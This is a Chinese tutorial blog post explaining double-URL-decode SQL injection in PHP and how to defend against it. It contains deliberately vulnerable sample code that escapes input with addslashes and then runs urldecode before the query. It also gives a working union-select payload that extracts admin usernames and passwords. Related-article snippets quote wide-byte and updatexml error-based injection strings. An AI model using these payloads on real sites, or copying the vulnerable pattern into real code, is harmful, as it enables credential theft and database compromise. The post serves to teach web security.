二次urldecode注入的原理和防御

最新推荐文章于 2024-08-13 16:15:00 发布
最新推荐文章于 2024-08-13 16:15:00 发布
阅读量887 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 数据库 php 渗透 渗透测试 入侵教材 网络安全 web入侵 SQL SQL语句 SQL初学者 SQL语句提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/107189435
版权

二次urldecode注入的原理


现在的web程序大多数都会进行参数过滤,通常使用addslashes()、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC的方式来防止注入,如果某处使用了urldecode或者rawurldecode函数,则会导致二次解码生成单引号而引发注入。 

用下面的代码我们简单的了解一下。
<?php

$w = addslashes($_GET['id']);
$p = urldecode($w);
echo '$w = '.$w.'<br / >';
echo '$p = '.$p;

?>

我们提交/1.php?id=1%2527,因为我们提交的参数里面没有单引号,所以第一次解码后的结果是 w = 1 w = 1%27,%25解码为%,如果程序里面使用了urldecode或者rawurldecode函数来解码id参数,解码后的结果为 w=1p = 1’单引号成功引发注入。在这里插入图片描述
既然已经了解原理那么利用就非常的简单了。

二次urldecode注入的利用

二次urldecode注入的利用
<?php

$conn = mysqli_connect('127.0.0.1','root','root','qingfeng');

$uid = addslashes($_GET['id']);

$a = urldecode($uid);

$sql = "select * from news where id = '$a'";

$result = mysqli_query($conn,"$sql");

@$row = mysqli_fetch_row($result);

echo ('当前SQL语句:'.$sql.'<br />结果:');

print_r($row);

?>

打开网页可以看到内容(下图)。
在这里插入图片描述
看前面的原理我们已经知道用%2527代替单引号可以引发注入,那么这里我们直接使用。
在这里插入图片描述
闭合、注释成功执行,接下来就和普通的sql注入一样用联合查询就可以了。
id=1%2527 and 1=2 union select username,password from admin – a在这里插入图片描述
成功的注入出了数据,管理员的账号密码。

二次urldecode注入的防御

  1. 可以循环判断传入执行的参数,对外部提交数据谨慎。
  2. 从数据库取数据时,不能轻易相信查询出的数据,要做到同样的转义或是辨别等
    可以进群一起学习哦!!!
    在这里插入图片描述
p_utao
关注
专栏目录
二次编码注入
rane的博客
03-18 638
原理PHP代码中使用了urldecode()等编解码函数,放在了一个尴尬的使用位置,与PHP自身编码配合失误 自己编写一个二次编码注入的代码 <?php error_reporting(E_ALL ^ E_DEPRECATED); header("Content-Type: text/html; charset=utf-8"); $conn = mysql_connect('loca...
mysql注入的 反斜杠,SQL注入防御绕过——二次编码之干掉反斜杠
weixin_28895433的博客
03-18 661
01 背景知识一、为什么要进行URL编码通常如果一样东西需要编码,说明这样东西并不适合传输。对于URL来说,编码主要是为了避免引发歧义与混乱。例如,URL参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/?name=abc&pwd=123如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引起歧义...
sql注入——二次注入
m0_64365018的博客
08-05 932
二次注入是一种较为隐蔽的 SQL 注入攻击方式。它并非直接在输入时进行攻击,而是先将恶意数据存储到数据库中,这些数据看似正常。随后,应用程序在后续的操作中,再次使用或处理这些之前存储的恶意数据时,未进行充分的过滤和验证,导致恶意数据被解释为可执行的 SQL 语句,从而引发安全漏洞。例如,用户注册时输入看似合法的用户名,之后在修改密码等操作中,系统未正确处理该用户名,使得攻击者能够篡改数据库中的数据。二次注入攻击具有很强的迷惑性,对数据库安全构成严重威胁,需要开发人员高度重视并采取有效的防护措施。
9.二次编码注入
kinght的博客
08-26 857
title: 9.二次编码注入 date: 2020-08-21 23:55:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 二次编码注入和宽字节注入有着异曲同工之妙,都是在面对PHP代码或者配置,对输入的‘(单引号)进行转义的时候,在处理用户输入的数据时存在问题,绕开了转义 二次编码注入原理 编码 为什么要进行编码 编码肯定是因为原始的格式并不适合传输才进行的,例如+,=,&,;等符号在http请求过程中会与原有格式.
代码审计之编码注入
qq_35420342的博客
04-06 548
    在sql编码注入里,最常见的编码注入是MySQL宽字节以及urldecode/rawurldecode函数导致的。    一、宽字节注入    在使用PHP连接mysql的时候,设置了“set character_set_client=gbk”,告诉MySQL服务器客户端来源数据编码是GBK,然后服务器对SQL查询语句进行GBK转码,导致当注入参数里带入%df%27时,可将程序中过滤的\(...
二次注入原理防御
weixin_30652897的博客
07-07 979
原理二次注入需要具备的两个条件: (1)用户向数据库插入恶意语句(即使后端代码对语句进行了转义,如mysql_escape_string、mysql_real_escape_string转义) (2)数据库对自己存储的数据非常放心,直接取出恶意数据给用户 举例: (1)在sqli_libs的第24关,其页面如下所示: (2)当我们点击Forgot your...
java --XXE 攻击原理防御
tryheart的博客
09-05 2014
什么是 XEE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。需要强调的是利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面。 XEE 背景 XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采
数据库学习笔记8--XFF注入攻击、 sql注入绕过、base64注入攻击、二次注入攻击
qq_41759633的博客
08-08 1804
XFF注入攻击 通过burp suite抓取数据包内容,可以看到HTTP请求头中有一个头部参数X-Forwarded-for.X-Forwarded-for简称XFF头,它代表客户端真是IP,通过修改X-Forwarded-for的值可以伪造客户端IP,将X-Forwarded-for设置为127.0.0.1然后访问该URL,页面返回正常。将X-Forwarded-for设置为127.0.0.1’...
Trimble Connect软件二次开发:安全性与数据保护机制
最新发布
kkchenjj的博客
08-13 919
在Trimble Connect软件的二次开发中,确保安全性与数据保护是至关重要的。
Epson RC+软件二次开发:RC+软件二次开发安全规范
kkchenjj的博客
08-01 307
在Epson RC+软件二次开发中,定义用户角色和权限是确保系统安全的关键步骤。这涉及到创建不同的用户角色,每个角色具有特定的权限集,以限制对敏感功能和数据的访问。例如,可以定义“管理员”、“操作员”和“访客”等角色,其中“管理员”拥有最高权限,可以进行系统配置和用户管理;“操作员”可以执行日常操作任务,如启动和停止机器人;而“访客”可能只能查看状态信息,无法进行任何操作。# 定义角色和权限'管理员': ['系统配置', '用户管理', '操作执行', '数据访问'],
宽字节注入二次解码注入
weixin_46446401的博客
02-19 3619
SQL注入中当单引号被过滤了可以使用者两种注入
2021-07-31
qq_43088273的博客
07-31 116
输入’ 发现’被转义成’/所以用%2527来绕过 因为爆了个错误所以判断有报错注入所以构造报错语句: %2527 and (updatexml(1,concat(0x7e,(database()),0x7e),1)) 然后爆表: %2527 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1).
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 3103
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透
代码审计与web安全第四章作业SQL注入
m0_72471315的博客
03-31 1627
代码审计与web安全第四章作业
urldecode类型注入
公众号shadow sock7
09-26 1877
%通过urlencode之后是%25; '通过urlencode以后是%27 如果在浏览器的地址栏输入的url包含%2527 那么服务器端的php调用echo $_GET['id'];的时候 会在检测到%以后的后面两个数字和%一起,即%25,将%25进行urldecode成为% 这样,再将剩下的27与已经urldecode的%组合成%27,这是'的urlencode形式,于是在服务端用%2
二次漏洞的简单防范
phphot
01-03 1792
本文主要针对PHP对MySQL的操作简单提出产生二次漏洞的原因,以及防范方案。一、提出问题众所周知,数据库操作中对于一些特殊字符(例如单引号“”、反斜线“/”等元字符)有着严格的限制,如果向数据库中写入的数据含有这样的特殊字符,操作将会带来不安全因素。所以对于用户输入的数据,我们完全认为它是没有安全性的,需要在程序中对其进行适当的过滤处理后,方可写入数据库。对于这点,相信大多数PHP程序员都会注
10.二次注入
kinght的博客
08-26 2378
title: 10.二次注入 date: 2020-08-22 23:55:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 二次注入与其他的注入不同,他不能再当前页面通过反馈来获取或者判断页面的信息,而是需要绕一个圈 二次注入原理 二次注入主要分为两步 第一步:插入恶意数据 第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身就包含恶意内容 第二部:引用恶意数据.
Less 24(二次注入
老司机开代码的博客
08-04 1012
文章目录前言1. 二次注入原理1.1 个人理解1.2 Example2. 题目分析2.1 主页2.2 注册页面2.3 登录成功界面(修改密码)3. 注入过程首先看一下数据库中原本的用户信息: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200711191827350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubm
python urldecode
08-19
decoded_url = urldecode(encoded_url) print(decoded_url) ``` 在这个示例中,我们导入了urllib.parse库,并定义了一个名为urldecode的函数。该函数接受一个经过URL编码的字符串作为参数,并使用urllib.parse....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值